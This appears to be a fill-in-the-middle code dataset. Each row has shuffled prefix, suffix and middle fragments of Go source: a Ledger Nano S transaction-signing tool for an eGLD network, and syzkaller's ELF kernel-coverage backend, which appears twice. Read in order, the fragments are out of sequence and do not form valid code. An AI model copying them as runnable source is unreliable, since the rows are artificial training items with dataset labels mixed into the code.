strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
} | log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil {
log.Println(errGetNetworkConfig, err)
waitInputAndExit()
}
fmt.Printf("Chain ID: %s\n\rTx version: %v\n\r",
netConfig.Data.Config.ChainID, netConfig.Data.Config.MinTransactionVersion)
if netConfig.Data.Config.ChainID != mainnetId {
ticker = "XeGLD"
}
nanos.Account, nanos.AddressIndex, err = getAccountAndAddressIndexFromUser()
if err != nil {
log.Println(errGetAccountAndAddressIndexFromUser, err)
waitInputAndExit()
}
fmt.Println("Retrieving address. Please confirm on your Ledger")
err = nanos.SetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errSetAddress, err)
waitInputAndExit()
}
senderAddress, err := nanos.GetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errGetAddress, err)
waitInputAndExit()
}
fmt.Printf("Address: %s\n\r", senderAddress)
// retrieve sender's nonce and balance
denomination = big.NewFloat(math.Pow10(netConfig.Data.Config.Denomination))
balance, nonce, err := getSenderInfo(string(senderAddress))
if err != nil || balance == nil {
log.Println(errGetBalanceAndNonce, err)
waitInputAndExit()
}
bigFloatBalance, _ := big.NewFloat(0).SetString(balance.String())
bigFloatBalance.Quo(bigFloatBalance, denomination)
strBalance := bigFloatBalance.String()
strSenderShard, err := getAddressShard(string(senderAddress), netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Sender shard: %v\n\rBalance: %v %s\n\rNonce: %v\n\r", strSenderShard, strBalance, ticker, nonce)
strReceiverAddress, bigIntAmount, data, err := getTxDataFromUser(nanos.ContractData)
if err != nil {
log.Println(err)
waitInputAndExit()
}
strReceiverShard, err := getAddressShard(strReceiverAddress, netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Receiver shard: %v\n\r", strReceiverShard)
// generate and sign transaction
var tx transaction
tx.SndAddr = string(senderAddress)
tx.RcvAddr = strReceiverAddress
tx.Value = bigIntAmount.String()
tx.Nonce = nonce
tx.GasPrice = netConfig.Data.Config.MinGasPrice
tx.Data = []byte(data)
tx.GasLimit = netConfig.Data.Config.MinGasLimit + uint64(len(data))*netConfig.Data.Config.GasPerDataByte
tx.ChainID = netConfig.Data.Config.ChainID
tx.Version = netConfig.Data.Config.MinTransactionVersion
err = signTransaction(&tx, nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
err = broadcastTransaction(tx)
if err != nil {
log.Println(err)
}
waitInputAndExit()
} | fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil { | random_line_split |
elf.go | // Copyright 2020 syzkaller project authors. All rights reserved.
// Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
package backend
import (
"bufio"
"bytes"
"debug/dwarf"
"debug/elf"
"encoding/binary"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"sort"
"strconv"
"strings"
"github.com/google/syzkaller/pkg/osutil"
"github.com/google/syzkaller/pkg/symbolizer"
"github.com/google/syzkaller/sys/targets"
)
func makeELF(target *targets.Target, objDir, srcDir, buildDir string) (*Impl, error) {
kernelObject := filepath.Join(objDir, target.KernelObject)
file, err := elf.Open(kernelObject)
if err != nil {
return nil, err
}
// Here and below index 0 refers to coverage callbacks (__sanitizer_cov_trace_pc)
// and index 1 refers to comparison callbacks (__sanitizer_cov_trace_cmp*).
var coverPoints [2][]uint64
var symbols []*Symbol
var textAddr uint64
errc := make(chan error, 1)
go func() {
symbols1, textAddr1, tracePC, traceCmp, err := readSymbols(file)
if err != nil {
errc <- err
return
}
symbols, textAddr = symbols1, textAddr1
if target.OS == targets.FreeBSD {
// On FreeBSD .text address in ELF is 0, but .text is actually mapped at 0xffffffff.
textAddr = ^uint64(0)
}
if target.Arch == targets.AMD64 {
coverPoints, err = readCoverPoints(file, tracePC, traceCmp)
} else {
coverPoints, err = objdump(target, kernelObject)
}
errc <- err
}()
ranges, units, err := readTextRanges(file)
if err != nil {
return nil, err
}
if err := <-errc; err != nil {
return nil, err
}
if len(coverPoints[0]) == 0 {
return nil, fmt.Errorf("%v doesn't contain coverage callbacks (set CONFIG_KCOV=y)", kernelObject)
}
symbols = buildSymbols(symbols, ranges, coverPoints)
nunit := 0 | }
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
}
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 {
break
}
pos += i
i = pos
off := uint64(int64(int32(binary.LittleEndian.Uint32(data[pos+1:]))))
pc := text.Addr + uint64(pos)
target := pc + off + callLen
if target == tracePC {
pcs[0] = append(pcs[0], pc)
} else if traceCmp[target] {
pcs[1] = append(pcs[1], pc)
}
}
return pcs, nil
}
// objdump is an old, slow way of finding coverage points.
// amd64 uses faster option of parsing binary directly (readCoverPoints).
// TODO: use the faster approach for all other arches and drop this.
func objdump(target *targets.Target, obj string) ([2][]uint64, error) {
var pcs [2][]uint64
cmd := osutil.Command(target.Objdump, "-d", "--no-show-raw-insn", obj)
stdout, err := cmd.StdoutPipe()
if err != nil {
return pcs, err
}
defer stdout.Close()
stderr, err := cmd.StderrPipe()
if err != nil {
return pcs, err
}
defer stderr.Close()
if err := cmd.Start(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v", obj, err)
}
defer func() {
cmd.Process.Kill()
cmd.Wait()
}()
s := bufio.NewScanner(stdout)
callInsns, traceFuncs := archCallInsn(target)
for s.Scan() {
if pc := parseLine(callInsns, traceFuncs, s.Bytes()); pc != 0 {
pcs[0] = append(pcs[0], pc)
}
}
stderrOut, _ := ioutil.ReadAll(stderr)
if err := cmd.Wait(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
if err := s.Err(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
return pcs, nil
}
func parseLine(callInsns, traceFuncs [][]byte, ln []byte) uint64 {
pos := -1
for _, callInsn := range callInsns {
if pos = bytes.Index(ln, callInsn); pos != -1 {
break
}
}
if pos == -1 {
return 0
}
hasCall := false
for _, traceFunc := range traceFuncs {
if hasCall = bytes.Contains(ln[pos:], traceFunc); hasCall {
break
}
}
if !hasCall {
return 0
}
for len(ln) != 0 && ln[0] == ' ' {
ln = ln[1:]
}
colon := bytes.IndexByte(ln, ':')
if colon == -1 {
return 0
}
pc, err := strconv.ParseUint(string(ln[:colon]), 16, 64)
if err != nil {
return 0
}
return pc
}
func cleanPath(path, objDir, srcDir, buildDir string) (string, string) {
filename := ""
switch {
case strings.HasPrefix(path, objDir):
// Assume the file was built there.
path = strings.TrimPrefix(path, objDir)
filename = filepath.Join(objDir, path)
case strings.HasPrefix(path, buildDir):
// Assume the file was moved from buildDir to srcDir.
path = strings.TrimPrefix(path, buildDir)
filename = filepath.Join(srcDir, path)
default:
// Assume this is relative path.
filename = filepath.Join(srcDir, path)
}
return strings.TrimLeft(filepath.Clean(path), "/\\"), filename
}
func archCallInsn(target *targets.Target) ([][]byte, [][]byte) {
callName := [][]byte{[]byte(" <__sanitizer_cov_trace_pc>")}
switch target.Arch {
case targets.I386:
// c1000102: call c10001f0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tcall ")}, callName
case targets.ARM64:
// ffff0000080d9cc0: bl ffff00000820f478 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.ARM:
// 8010252c: bl 801c3280 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.PPC64LE:
// c00000000006d904: bl c000000000350780 <.__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// 838: bl 824 <__sanitizer_cov_trace_pc+0x8>
// This occurs on PPC64LE:
// c0000000001c21a8: bl c0000000002df4a0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl ")}, [][]byte{
[]byte("<__sanitizer_cov_trace_pc>"),
[]byte("<__sanitizer_cov_trace_pc+0x8>"),
[]byte(" <.__sanitizer_cov_trace_pc>"),
}
case targets.MIPS64LE:
// ffffffff80100420: jal ffffffff80205880 <__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// b58: bal b30 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tbal\t")}, callName
case targets.S390x:
// 1001de: brasl %r14,2bc090 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbrasl\t")}, callName
case targets.RiscV64:
// ffffffe000200018: jal ra,ffffffe0002935b0 <__sanitizer_cov_trace_pc>
// ffffffe0000010da: jalr 1242(ra) # ffffffe0002935b0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tjalr\t")}, callName
default:
panic(fmt.Sprintf("unknown arch %q", target.Arch))
}
} | for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit | random_line_split |
elf.go | // Copyright 2020 syzkaller project authors. All rights reserved.
// Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
package backend
import (
"bufio"
"bytes"
"debug/dwarf"
"debug/elf"
"encoding/binary"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"sort"
"strconv"
"strings"
"github.com/google/syzkaller/pkg/osutil"
"github.com/google/syzkaller/pkg/symbolizer"
"github.com/google/syzkaller/sys/targets"
)
func makeELF(target *targets.Target, objDir, srcDir, buildDir string) (*Impl, error) {
kernelObject := filepath.Join(objDir, target.KernelObject)
file, err := elf.Open(kernelObject)
if err != nil {
return nil, err
}
// Here and below index 0 refers to coverage callbacks (__sanitizer_cov_trace_pc)
// and index 1 refers to comparison callbacks (__sanitizer_cov_trace_cmp*).
var coverPoints [2][]uint64
var symbols []*Symbol
var textAddr uint64
errc := make(chan error, 1)
go func() {
symbols1, textAddr1, tracePC, traceCmp, err := readSymbols(file)
if err != nil {
errc <- err
return
}
symbols, textAddr = symbols1, textAddr1
if target.OS == targets.FreeBSD {
// On FreeBSD .text address in ELF is 0, but .text is actually mapped at 0xffffffff.
textAddr = ^uint64(0)
}
if target.Arch == targets.AMD64 {
coverPoints, err = readCoverPoints(file, tracePC, traceCmp)
} else {
coverPoints, err = objdump(target, kernelObject)
}
errc <- err
}()
ranges, units, err := readTextRanges(file)
if err != nil {
return nil, err
}
if err := <-errc; err != nil {
return nil, err
}
if len(coverPoints[0]) == 0 {
return nil, fmt.Errorf("%v doesn't contain coverage callbacks (set CONFIG_KCOV=y)", kernelObject)
}
symbols = buildSymbols(symbols, ranges, coverPoints)
nunit := 0
for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit
}
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func | (target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
}
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 {
break
}
pos += i
i = pos
off := uint64(int64(int32(binary.LittleEndian.Uint32(data[pos+1:]))))
pc := text.Addr + uint64(pos)
target := pc + off + callLen
if target == tracePC {
pcs[0] = append(pcs[0], pc)
} else if traceCmp[target] {
pcs[1] = append(pcs[1], pc)
}
}
return pcs, nil
}
// objdump is an old, slow way of finding coverage points.
// amd64 uses faster option of parsing binary directly (readCoverPoints).
// TODO: use the faster approach for all other arches and drop this.
func objdump(target *targets.Target, obj string) ([2][]uint64, error) {
var pcs [2][]uint64
cmd := osutil.Command(target.Objdump, "-d", "--no-show-raw-insn", obj)
stdout, err := cmd.StdoutPipe()
if err != nil {
return pcs, err
}
defer stdout.Close()
stderr, err := cmd.StderrPipe()
if err != nil {
return pcs, err
}
defer stderr.Close()
if err := cmd.Start(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v", obj, err)
}
defer func() {
cmd.Process.Kill()
cmd.Wait()
}()
s := bufio.NewScanner(stdout)
callInsns, traceFuncs := archCallInsn(target)
for s.Scan() {
if pc := parseLine(callInsns, traceFuncs, s.Bytes()); pc != 0 {
pcs[0] = append(pcs[0], pc)
}
}
stderrOut, _ := ioutil.ReadAll(stderr)
if err := cmd.Wait(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
if err := s.Err(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
return pcs, nil
}
func parseLine(callInsns, traceFuncs [][]byte, ln []byte) uint64 {
pos := -1
for _, callInsn := range callInsns {
if pos = bytes.Index(ln, callInsn); pos != -1 {
break
}
}
if pos == -1 {
return 0
}
hasCall := false
for _, traceFunc := range traceFuncs {
if hasCall = bytes.Contains(ln[pos:], traceFunc); hasCall {
break
}
}
if !hasCall {
return 0
}
for len(ln) != 0 && ln[0] == ' ' {
ln = ln[1:]
